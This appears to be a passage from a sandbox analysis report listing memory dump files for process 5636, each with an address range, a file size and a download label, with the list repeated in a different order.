                                                                                                          • memory/5636-699-0x00007FFFEB5E0000-0x00007FFFEB5E2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-709-0x00007FFFEB670000-0x00007FFFEB672000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-712-0x00007FFFEB6A0000-0x00007FFFEB6A2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-704-0x00007FFFEB630000-0x00007FFFEB632000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-705-0x00007FFFEB640000-0x00007FFFEB642000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-707-0x00007FFFEB650000-0x00007FFFEB652000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-708-0x00007FFFEB660000-0x00007FFFEB662000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-702-0x00007FFFEB610000-0x00007FFFEB612000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-692-0x00007FFFEB570000-0x00007FFFEB572000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-693-0x00007FFFEB580000-0x00007FFFEB582000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-694-0x00007FFFEB590000-0x00007FFFEB592000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-695-0x00007FFFEB5A0000-0x00007FFFEB5A2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-696-0x00007FFFEB5B0000-0x00007FFFEB5B2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-697-0x00007FFFEB5C0000-0x00007FFFEB5C2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-698-0x00007FFFEB5D0000-0x00007FFFEB5D2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-700-0x00007FFFEB5F0000-0x00007FFFEB5F2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-701-0x00007FFFEB600000-0x00007FFFEB602000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-711-0x00007FFFEB690000-0x00007FFFEB692000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-710-0x00007FFFEB680000-0x00007FFFEB682000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-703-0x00007FFFEB620000-0x00007FFFEB622000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-688-0x000001DF665B0000-0x000001DF671CE000-memory.dmp

                                                                                                            Filesize

                                                                                                            12.1MB

                                                                                                            Download

                                                                                                          • memory/5636-689-0x000001DF665B0000-0x000001DF671CE000-memory.dmp

                                                                                                            Filesize

                                                                                                            12.1MB

                                                                                                            Download

                                                                                                          • memory/5636-690-0x000001DF665B0000-0x000001DF671CE000-memory.dmp

                                                                                                            Filesize

                                                                                                            12.1MB

                                                                                                            Download

                                                                                                          • memory/5636-713-0x000001DF68CD0000-0x000001DF68D06000-memory.dmp

                                                                                                            Filesize

                                                                                                            216KB

                                                                                                            Download

                                                                                                          • memory/5636-690-0x000001DF665B0000-0x000001DF671CE000-memory.dmp

                                                                                                            Filesize

                                                                                                            12.1MB

                                                                                                            Download

                                                                                                          • memory/5636-689-0x000001DF665B0000-0x000001DF671CE000-memory.dmp

                                                                                                            Filesize

                                                                                                            12.1MB

                                                                                                            Download

                                                                                                          • memory/5636-688-0x000001DF665B0000-0x000001DF671CE000-memory.dmp

                                                                                                            Filesize

                                                                                                            12.1MB

                                                                                                            Download

                                                                                                          • memory/5636-703-0x00007FFFEB620000-0x00007FFFEB622000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-701-0x00007FFFEB600000-0x00007FFFEB602000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-700-0x00007FFFEB5F0000-0x00007FFFEB5F2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-698-0x00007FFFEB5D0000-0x00007FFFEB5D2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-697-0x00007FFFEB5C0000-0x00007FFFEB5C2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-696-0x00007FFFEB5B0000-0x00007FFFEB5B2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-695-0x00007FFFEB5A0000-0x00007FFFEB5A2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-694-0x00007FFFEB590000-0x00007FFFEB592000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-693-0x00007FFFEB580000-0x00007FFFEB582000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-692-0x00007FFFEB570000-0x00007FFFEB572000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-702-0x00007FFFEB610000-0x00007FFFEB612000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-708-0x00007FFFEB660000-0x00007FFFEB662000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-707-0x00007FFFEB650000-0x00007FFFEB652000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-705-0x00007FFFEB640000-0x00007FFFEB642000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-704-0x00007FFFEB630000-0x00007FFFEB632000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-699-0x00007FFFEB5E0000-0x00007FFFEB5E2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-713-0x000001DF68CD0000-0x000001DF68D06000-memory.dmp

                                                                                                            Filesize

                                                                                                            216KB

                                                                                                            Download

                                                                                                          • memory/5636-712-0x00007FFFEB6A0000-0x00007FFFEB6A2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-711-0x00007FFFEB690000-0x00007FFFEB692000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-710-0x00007FFFEB680000-0x00007FFFEB682000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download

                                                                                                          • memory/5636-709-0x00007FFFEB670000-0x00007FFFEB672000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                            Download